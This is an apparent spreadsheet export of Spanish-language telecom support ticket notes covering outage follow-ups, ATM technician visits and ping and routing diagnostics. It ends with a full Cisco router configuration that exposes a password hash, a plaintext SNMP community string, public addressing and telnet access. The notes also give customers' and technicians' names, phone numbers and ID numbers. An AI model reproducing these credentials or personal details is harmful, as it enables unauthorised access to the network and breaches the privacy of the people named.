ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB BCA CARRETERA EL SALVADOR - G74-N00024GT-GT2936F-NP [426100049] - LINK DOWN || IMBBL004153</t>
  </si>
  <si>
    <t>F4593407</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB BCA CARRETERA EL SALVADOR - G74-M00025GT-GT2935F-NP [588100017] - LINK DOWN || IMBBL004153</t>
  </si>
  <si>
    <t>F4593409</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE CALL ID 1001872819 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100046T :: TICKET CNOC IMBBL004155::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>F4593415</t>
  </si>
  <si>
    <t>ASHLY , 3849-3423 SE UBICAN CONTACTOS EN TICKETS ANTERIORES, CLIENTE DEJA DE LABORAR A LAS 5 PM, SE BRINDARA SEGUIMIENTO EN HORARIO HABIL.</t>
  </si>
  <si>
    <t>F4593417</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 18:57
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELEMATICAGT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;
ASUNTO: RE: MPLS- ID 17400442 - ATM-PL-375-SHIWON - TICKET 1133054
BUENAS NOCHES APRECIABLE CLIENTE
PERDÓN LA DEMORA.
LE PROPORCIONAMOS EL LISTADO DEL PERSONAL TÉCNICO, FAVOR SU APOYO AGENDANDO LA VISITA A LAS 11:00HRS DE MAÑANA 8 DE JUNIO DE 2022
PERSONAL A CARGO
DAVID FLORENCIO ROMERO BENITO 719816 2619 94115 0301 58261402
WALTER JOSE OLIVA ROMAN 688386 2778 53699 0406 58269375</t>
  </si>
  <si>
    <t>*** SE CONVERSA CON CLIENTE ESTUARDO SAQUICH 59519771 (ID 1001926625), COMENTA QUE VALIDARÁ EL TEMA DE INGRESO DE SU TÉCNICO COMO EL DE CLARO ***</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO SAQUICH 59519771 MENCIONA QUE SI CUENTA CON ENERGIA EN PR Y QUE ES UN ATM
-ID 1001869780
NOMBRE DEL CLIENTE: CREDOMATIC  GUATEMALA, S.A.
UBICACIÓN:KM 28.5 CARRETERA INTERAMERICANA 4 CAMINOS CANTON REFORMA LOTE #89 SAN LUCAS SACATEPEQUEZ
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO  TELEMATICAGT@BACCREDOMATIC.GT</t>
  </si>
  <si>
    <t>F4593447</t>
  </si>
  <si>
    <t>SE GESTIONA APERTURA DE CAJERO
RE: [SOLICITUD :##RE-759532##] : CAJEROS ATM ATM2885 CAIDA DE SERVICIO
JONATHAN EDUARDO TEZEN MEJIA
BUENAS TARDES ESTIMADO CLIENTE
SOLICITANDO DE SU VALIOSO APOYO CON GESTIONAR APERTURA DE CAJERO PARA EL SERVICIO : F4593447 | TRANSACCIONES Y TRANSFERENCIAS CC_TYT_GT_ATM2885 | CAJERO 2885 FARMACIA GALENO, 3 C. 0-82 ZONA 2 PALIN ESCUINTLA| SOLICITAMOS  APERTURA DE CAJERO  A LAS 09:00 AM EL DIA DE MAÑANA 09/06/2022
TECNICO QUE ATENDERA FALLA
NOMBRE: AXEL DANILO ZARPEC SAZO
 IBM: 796395
 DPI: 1624525270501
EN ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>SE HABLÓ CON MOISÉS PACAJÓ/CLIENTE 47502143 SE LE PIDE APOYO A VERIFICAR SERVICIO, INDICA QUE AÚN CUENTA CON TIEMPOS ALTOS, SE LE PIDE TELS PR PARA PRUEBAS, INDICA QUE LOS ENVIARÁ, PERO PIDE SE LE ENVÍE CORREO.
ASUNTO: RE: [SOLICITUD :##RE-759532##] : CAJEROS ATM ATM2885 CAIDA DE SERVICIO</t>
  </si>
  <si>
    <t>VISITA CONFIRMADA  09-06-2022 A LAS 09:00
MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
BUEN DÍA
CONFIRMADO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4593458</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEVIN CELEDON 86974206 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001945938
**</t>
  </si>
  <si>
    <t>-* SE RECIBE CORREO DE CLIENTE INDICANDO QUE TIENES PROBLEMAS CON LA CONECTIVIDAD WIFI -*
-*
RE: ENLACE INTERNET PLANTA HF SEBACO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN CELEDON 86974206 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001916549 - 1001916929</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL KEVIN ZELEDON AL 505-5870-9114 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001990642
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A KEVIN ZELEDÓN/CLIENTE 505 86974206 NO RESPONDE SE LLAMA A CLIENTE A CENTRAL JOSE MARTINEZ  AL 505 5872-2840  INDICA QUE SE LLAME AL SEÑOR KEVIN AL NUMERO  58709114**
-ID 1001988353- 1001988501
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A KEVIN ZELEDÓN/CLIENTE 505 86974206 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE LLAMA A CENTRAL 505 5872-2840 NO CONTESTA.
A NIVEL DE CLARO ENLACE OK, SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: ENLACE INTERNET PLANTA HF SEBACO</t>
  </si>
  <si>
    <t>F4593465</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO FUENTES 78872998 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001061264</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO FUENTES AL 78872998 INDICA QUE NO ESTA EN OFICINA SOLICITA QUE SE LE LLAME A MEDIO DIA Y SI AUN NO ESTA ESTABLE EL SE COMUNICARA **
ID 1001900809
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO FUENTES AL 78872998 INDICA QUE ESTA HACIENDO PING Y AUN TIENE PERDIDAS || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
-ID 1001992705
**</t>
  </si>
  <si>
    <t>F4593493</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE VALIDE SERVICIO MAÑANA A LAS 10:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEJANDRO ILLESSCAS 57339641 INDICA QUE ESTAN REALIZANDO REVISION CON CALL MANAGER LIC SUJEIDY PAPA QUE ES LA GERENTE COMERCIAL DE CLARO PERSONA QUIEN LE INDICO QUE NO SE CIERRE EL TICKET HASTA QUE TERMINE LA REVISION SOLICITA QUE SE LE LLAME MAÑANA NUEVAMENTE A LAS 10:00 AM  **
ID 1001943463
**</t>
  </si>
  <si>
    <t>F4593494</t>
  </si>
  <si>
    <t>A ESPERA DE CORREO DEL CLIENTE PARA PODER VALIDAR EL SERVICIO.
&lt;GMIXGTMVN1T1B03B02EIM4&gt;PING -C 1000 -S 1000 -M 55 -BRIEF -VPN-INSTANCE INTERNET_GT_METRO 10.78.93.84
  PING 10.78.93.84: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.93.84 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;GMIXGTMVN1T1B03B02EIM4&gt;</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100024T ::: TICKET CNOC IMBBL004156 ::: "PAQUETES PERDIDOS"</t>
  </si>
  <si>
    <t>SE PROCEDE CON CIERRE EL CLIENTE RESPONDE CORREO</t>
  </si>
  <si>
    <t>F4593509</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 15:50
PARA: WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CARLOS.MOZARAN@CAYCSOL.COOP.HN &lt;CARLOS.MOZARAN@CAYCSOL.COOP.HN&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: GRAFICAS DEL SERVICIO 549454OH
*-*-*-**</t>
  </si>
  <si>
    <t>F4593541</t>
  </si>
  <si>
    <t>SE VALIDA QUE A NIVEL WAN SE TIENE PERDIDAS EN EL SERVICIO LLEGANDO A LA WAN DEL CPE SE LLAMA AL CLIENTE COMO INDICA EN LA APERTURA DEL CLIENTE Y SE LE INDICA QUE YA SE ENCUENTRA EN REVICION EL ENLACE Y SE LE BRINDARAN AVANCES EN 1 HORA APROXIMADA MENTE SE PORCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR LLAMADA DEL CLIENTE EN UNA HORA.
&lt;TMATNIB2NID1B04B01EID2&gt;PIN -C 1000  -B -M 50 -VP  INTERNET_NI_DEPTAL 10.47.129.22
  PING 10.47.129.22: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !.!!!!!!!!!!!!.!!.!.!!!!.!!.!!..!!.!!!!!.!!!!!.!!!!..!!!!!!!!!!!!!.!!!!!!!!!.!.!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!.!!!!!!!!.!!!!!.!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!..!!!!!!!.!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!.!!!!!!.!!!!.!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!..!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!..!.!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!.!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.47.129.22 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    948 PACKET(S) RECEIVED
    5.20% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/5/14 MS
PE  10.179.34.50
&lt;TMATNIB2NID1B04B01EID2&gt;
&lt;TMATNIB2NID1B04B01EID2&gt;DIS CUR | IN 10.47.129.22
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE INTERNET_NI_DEPTAL 10.99.202.113 255.255.255.255 10.47.129.22 DESCRIPTION NMIS_SIUNA
IP ROUTE-STATIC VPN-INSTANCE INTERNET_NI_DEPTAL 186.77.181.26 255.255.255.255 10.47.129.22 DESCRIPTION INTERNET_PMA_SUINA_OPEN_4425060
IP ROUTE-STATIC VPN-INSTANCE INTERNET_NI_DEPTAL 186.77.181.27 255.255.255.255 10.47.129.22 DESCRIPTION INTERNET_PMA_SUINA_OPEN_4425060
&lt;TMATNIB2NID1B04B01EID2&gt;DIS IP ROUTIN
&lt;TMATNIB2NID1B04B01EID2&gt;DIS IP ROUTING-TABLE VP  INTERNET_NI_DEPTAL 10.47.129.22
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_NI_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.47.129.20/30  DIRECT  0    0             D   10.47.129.21    VBDIF2239
&lt;TMATNIB2NID1B04B01EID2&gt;DIS CUR INTER   VBDIF2239
#
INTERFACE VBDIF2239
 DESCRIPTION INTERNET_PMA_SIUNA_OPEN_4425060
 IP BINDING VPN-INSTANCE INTERNET_NI_DEPTAL
 IP ADDRESS 10.47.129.21 255.255.255.252
#
RETURN</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO SIN TERNER RESPUESTA SE PASA A OTRO INCIDENTE SE LLAMARA LUEGO
1001928346
COLA:
NOMBRE: A: 50588509027
NÚMERO: 50588509027
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50588509027
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 8/06/2022 09:16:48</t>
  </si>
  <si>
    <t>SE ESTABA EN OTRA GESTION SE RETOMA TKT
1001914585
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58262505
NÚMERO: 58262505
DURACIÓN: 0:37:06
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58262505
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 8/06/2022 09:14:07</t>
  </si>
  <si>
    <t>SE ADJUNTA EN EL TTK  FORMATO CORRECTO. SE SOLICITA APOYO A LOS COMPAÑEROS  DE WO</t>
  </si>
  <si>
    <t>F4593549</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE LUIS  FUENTES AL 5032556-2880 NO RESPONDE || ENVIA A BUZON ||
SE INTENTARA LUEGO**
ID 1001912914
**</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE LUIS  FUENTES AL 5032556-2880 CONTESTA EL SEÑOR MIGUEL TREJO CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET**
ID 1001940815- 1001942027
**</t>
  </si>
  <si>
    <t>F4593556</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANTONI LORENZANA AL 57779052 CONFIRMA SERVICIO ESTABLE Y OPERATIVO ||
AUTORIZA CIERRE DE TICKET **
-ID 1001939699
**</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ANTONI LORENZANA/CLIENTE 57779052 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4593559</t>
  </si>
  <si>
    <t>CLIENTE FUERA DE HORARIO LABORAL; SE CONTINUARÁ SEGUIMIENTO DEL TICKET MAÑANA A PARTIR DE LAS 09:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EMA REYNOSO 56956594 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001926515</t>
  </si>
  <si>
    <t>F4593584</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE TUVO UNA INTERMITENCIA EN EL CPE EN LA INTEFACE FISICA GIGA 0/0 DEL ROUTER CPE LA CUALCREO UNA INTERMITENCIA MOMENTANEA EN EL SE VALIDARA CON EL CLIENTE .
ROUTER CPE ACTIVO HACE 6 SEMAN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ISCO_1921_COOPERATIVA_SONAGUERA_CENTRA UPTIME IS 6 WEEKS, 3 DAYS, 1 HOUR, 38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1943E0XV
3 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250864K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC1943E0XV
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4184 BYTES
!
! LAST CONFIGURATION CHANGE AT 17:29:06 UTC FRI APR 29 2022 BY CLARO
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
IP VRF DATOS
 RD 3005:3005
 ROUTE-TARGET EXPORT 3005:3005
 ROUTE-TARGET IMPORT 3005:3005
!
!
!
!
NO IP DOMAIN LOOKUP
IP DOMAIN NAME CLARO.HN
IP NAME-SERVER 200.107.124.253
IP NAME-SERVER 200.107.124.254
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC1943E0XV
!
!
USERNAME CLARO PRIVILEGE 15 SECRET 5 $1$BIA3$IGPO2HHE0NOZRLQ3OXCPM.
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 NO IP ADDRESS
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0.169
 DESCRIPTION INTERFACE_INTERNET ID549454
 ENCAPSULATION DOT1Q 169
 IP ADDRESS 10.2.51.10 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/0.2305
 DESCRIPTION GESTION
 ENCAPSULATION DOT1Q 2305
 IP ADDRESS 10.82.76.18 255.255.255.192
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/0.3005
 DESCRIPTION INTERFACE_DATOS ID549549
 ENCAPSULATION DOT1Q 3005
 IP VRF FORWARDING DATOS
 IP ADDRESS 10.2.41.30 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION (HACIA MIKROTIK CENTRAL)
 IP VRF FORWARDING DATOS
 IP ADDRESS 10.122.150.3 255.255.255.0 SECONDARY
 IP ADDRESS 172.17.1.1 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 56320000 10560000 21120000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 56320000 10560000 21120000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION VLAN INTERNET
 IP ADDRESS 190.105.129.225 255.255.255.240
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 40960000 7680000 15360000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 40960000 7680000 15360000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 3600
!
IP ROUTE 0.0.0.0 0.0.0.0 10.2.51.9
IP ROUTE 10.33.2.0 255.255.255.0 10.82.76.1 NAME GESTION_SOLAR
IP ROUTE 10.195.4.79 255.255.255.255 10.82.76.1 NAME GESTION_GT_TGU
IP ROUTE VRF DATOS 10.122.57.0 255.255.255.0 10.2.41.29 NAME CATACAMAS
IP ROUTE VRF DATOS 10.122.58.0 255.255.255.0 10.2.41.29 NAME 1603306_DT_COOP-SONAGUERA_JCP03
IP ROUTE VRF DATOS 10.122.151.0 255.255.255.0 10.2.41.29 NAME SABA_(ELIMINAR_VIEJO)
IP ROUTE VRF DATOS 10.122.152.0 255.255.255.0 10.2.41.29 NAME TOCOA_(ELIMINAR_VIEJO)
IP ROUTE VRF DATOS 10.122.153.0 255.255.255.0 10.2.41.29 NAME BONITO_ORIENTAL_(ELIMINAR_VIEJO)
IP ROUTE VRF DATOS 10.122.154.0 255.255.255.0 10.2.41.29 NAME ILANGA_(ELIMINAR_VIEJO)
IP ROUTE VRF DATOS 10.122.155.0 255.255.255.0 10.2.41.29 NAME SAN_ESTEBAN_OLANCHO_(ELIMINAR_VIEJO)
IP ROUTE VRF DATOS 10.122.156.0 255.255.255.0 10.2.41.29 NAME GUALACO_PRUEBA
IP ROUTE VRF DATOS 172.17.1.8 255.255.255.252 10.2.41.29 NAME SONAGUERA_SABA
IP ROUTE VRF DATOS 172.17.1.12 255.255.255.252 10.2.41.29 NAME TOCOA
IP ROUTE VRF DATOS 172.17.1.16 255.255.255.252 10.2.41.29 NAME BONITO
IP ROUTE VRF DATOS 172.17.1.20 255.255.255.252 10.2.41.29 NAME ILANGA
IP ROUTE VRF DATOS 172.17.1.24 255.255.255.252 10.2.41.29 NAME SAN_ESTEBAN_OLANCHO
IP ROUTE VRF DATOS 172.17.1.28 255.255.255.252 10.2.41.29 NAME GUALACO
IP ROUTE VRF DATOS 172.17.1.32 255.255.255.252 10.2.41.29 NAME CATACAMAS
IP ROUTE VRF DATOS 172.17.1.36 255.255.255.252 10.2.41.29 NAME 1603306_DT_COOP-SONAGUERA_JCP03
IP ROUTE VRF DATOS 172.17.2.8 255.255.255.252 10.2.41.29 NAME TEGUCIGALPA
!
!
!
SNMP-SERVER COMMUNITY G3$T10NH0NDUR@$ RO
!
CONTROL-PLANE
!
!
!
LINE CON 0
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT TELNET SSH
!
SCHEDULER ALLOCATE 20000 1000
!
END
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 82 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 82 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 85 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*APR 24 00:46:09.391: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 24 00:46:09.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 24 00:46:09.391: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 24 00:46:10.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*APR 24 00:46:10.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 24 00:46:14.507: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*APR 24 00:46:17.019: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*APR 24 00:46:18.371: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
